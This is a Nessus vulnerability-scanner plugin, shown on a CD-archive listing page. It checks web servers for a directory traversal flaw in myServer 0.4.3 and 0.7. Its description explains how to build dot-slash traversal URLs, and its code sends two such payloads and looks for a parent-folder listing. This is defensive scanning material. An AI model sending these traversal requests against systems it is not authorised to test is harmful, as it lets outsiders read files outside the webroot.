home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / myserver_traversal.nasl < prev    next >
Encoding:
Text File  |  2005-03-31  |  2.7 KB  |  86 lines
  1. #
  2. # This script was written by Paul Johnston of Westpoint Ltd <paul@westpoint.ltd.uk>
  3. #
  4. # See the Nessus Scripts License for details
  5. #
  6. # References:
  7. #
  8. # From:    "Securiteinfo.com" <webmaster@securiteinfo.com>
  9. # To:    bugtraq@securityfocus.com
  10. # Date:    Wed, 15 Sep 2004 17:42:48 +0200
  11. # CC:    admin@succurit.com, bugs@securitytracker.com, contact@isecurelabs.com,
  12. #  dis@phreak.org, news@securiteam.com, snpMarq@yahoo.com, 
  13. #  submissions@packetstormsecurity.org, ts@securityoffice.net, 
  14. #  vuln@security-corporation.com, vulnwatch@vulnwatch.org
  15. # Message-Id:    <200409151742.48914.webmaster@securiteinfo.com>
  16. # Subject:    myServer 0.7 Directory Traversal Vulnerability
  18.  
  19. if(description)
  20. {
  21.  script_id(11851);
  22.  script_version ("$Revision: 1.3 $");
  23.  
  24.  name["english"] = "myServer 0.4.3 / 0.7 Directory Traversal Vulnerability";
  25.  script_name(english:name["english"]);
  26.  
  27.  desc["english"] = "
  28. This web server is running myServer <= 0.4.3 or 0.7. This version contains
  29. a directory traversal vulnerability, that allows remote users with
  30. no authentication to read files outside the webroot.
  31.  
  32. You have to create a dot-dot URL with the same number of '/./' and '/../'
  33. + 1. For example, you can use :
  34. /././..
  35. /./././../..
  36. /././././../../..
  37. /./././././../../../..
  38. etc...
  39. or a long URL starting with ./././. etc.
  40.  
  41. More information : http://www.securityfocus.com/archive/1/339145
  42.  
  43. Solution : Upgrade to myServer 0.7.1 or later
  44. Risk factor : High";
  45.  
  46.  
  47.  script_description(english:desc["english"]);
  48.  
  49.  summary["english"] = "Attempts to retrieve the path '/././..'";
  50.  script_summary(english:summary["english"]);
  51.  
  52.  script_category(ACT_ATTACK);
  53.  script_copyright(english:"Author Paul Johnston paul@westpoint.ltd.uk, Copyright (C) 2003 Westpoint Ltd");
  54.  script_family(english:"CGI abuses");
  55.  
  56.  script_dependencie("find_service.nes", "http_version.nasl");
  57.  script_require_ports("Services/www", 80);
  58.  
  59.  exit(0);
  60. }
  61.  
  62. include("http_func.inc");
  63. include("http_keepalive.inc");
  64.  
  65. port = get_http_port(default:80);
  66.  
  67. if(!get_port_state(port))exit(0);
  68.  
  69. # In fact, myServer 0.7 is also vulnerable to the first URL.
  70. # However, as the bug was supposed to be fixed in 0.4.3 and reappeared in 
  71. # 0.7, I think that checking every avatar is safer.
  72.  
  73. foreach pattern (make_list("/././..", "././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../"))
  74. {
  75.  req = http_get(item: pattern, port:port);
  76.  res = http_keepalive_send_recv(port:port, data:req);
  77.  if(res == NULL) exit(0);
  78.  
  79.  if(ereg(pattern:"^HTTP/[0-9]\.[0-9] 200 ", string:res)
  80.     && egrep(pattern:"Contents of folder \.\.", string:res, icase:1))
  81.  {
  82.   security_hole(port);
  83.   exit(0);
  84.  }
  85. }
  86.